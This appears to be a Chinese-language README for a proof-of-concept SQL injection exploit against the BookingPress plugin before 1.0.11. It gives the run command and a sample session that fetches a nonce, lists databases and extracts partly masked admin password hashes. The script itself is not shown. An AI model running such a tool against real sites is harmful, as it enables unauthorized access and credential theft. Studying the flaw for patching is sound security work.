Proof-of-Concept 利用(SQL注入 BookingPress 1.0.11 之前版本)
提供应用中正在使用 Booking Press 插件的 URL。
bash exploit.sh '<在此处插入 url>'
例如(此演示中的哈希值已打码)
┌──(user@user)-[~/]
└─$ bash sqli_exploit.sh 'http://localhost/calendar/'
____ __ _ ____
/ __ )____ ____ / /__(_)___ ____ _/ __ \________ __________
/ __ / __ \/ __ \/ //_/ / __ \/ __ `/ /_/ / ___/ _ \/ ___/ ___/
/ /_/ / /_/ / /_/ / ,< / / / / / /_/ / ____/ / / __(__ |__ )
/_____/\____/\____/_/|_/_/_/ /_/\__, /_/ /_/ \___/____/____/
/____/
_______ ________ ___ ____ ___ ___ ____ __________ ____
/ ____/ | / / ____/ |__ \ / __ \__ \|__ \ / __ \/__ /__ // __ \
/ / | | / / __/________/ // / / /_/ /__/ /_____/ / / / / / /_ </ /_/ /
/ /___ | |/ / /__/_____/ __// /_/ / __// __/_____/ /_/ / / /___/ /\__, /
\____/ |___/_____/ /____/\____/____/____/ \____/ /_//____//____/
[+] 正在利用 http://localhost ...
[+] 在 http://localhost/calendar/ 发现存在漏洞的 URL ...
[+] 正在获取 nonce...
[+] 找到 nonce: 219087f4c2
[+] 提取数据库名称...
information_schema
test_db
[+] 正在获取凭据...
admin $P$BGrGrgXXXXXXXXXXXXXX
testUs3r $P$B4aNM28NXXXXXXXXXXX
免责声明
未经双方事先同意使用此程序可被视为非法活动。最终用户有责任遵守所有适用的当地、州和联邦法律。开发人员不承担任何责任,并且不对因使用此程序而造成的任何滥用或损害负责。